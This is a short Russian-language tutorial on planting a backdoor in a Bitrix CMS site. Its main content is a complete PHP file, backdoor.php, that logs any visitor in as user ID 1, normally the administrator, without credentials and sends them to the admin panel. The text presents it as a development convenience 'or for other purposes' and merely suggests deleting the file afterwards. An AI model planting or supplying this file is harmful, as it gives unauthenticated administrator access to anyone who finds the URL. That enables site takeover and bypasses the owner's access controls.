В данной очень краткой заметке рассмотрен вопрос: Как сделать простой бекдор на битриксе. Это может понадобится, например, на время разработки, когда разработчику не очень удобно каждый раз вводить свой логин и пароль. Либо же, для каких-либо других целей.
Итак, для того, чтобы сделать backdoor — нам, в любом случае, понадобится:
- Либо доступ в админку
- Либо доступ по фтп
- Либо доступ на сервер
То есть, любой вариант, где мы можем либо редактировать, либо залить на сервер php-файл.
Предположим, что доступ у нас есть. Что нужно делать далее?
Собственно, весь «алгоритм» состоит из двух шагов:
Шаг 1. PHP-файл со скриптом авторизации
Создаем в корне сайта php-файл с произвольным названием, пусть это будет backdoor.php. Внутри сайта пишем:
<?
require $_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php";
$USER->Authorize('1');
LocalRedirect('/bitrix/admin/');
?>
Что делает данный скрипт?
- Подключаем служебную часть пролога с необходимыми функциями
- Вызываем функцию авторизации под пользователем с ID = 1
- Производим редирект в административную панель
Собственно, весь бекдор.
Шаг 2. Авторизация
Чтобы авторизоваться на сайте через данный файл, нужно открыть данную страницу в браузере. Например, http://адрес-сайта.рф/backdoor.php
И после отработки скрипта попадаем в админку.
Конечно, стоит заметить, что после завершения работ на сайте этот файл лучше потереть, дабы кто-нибудь другой не наткнулся на него.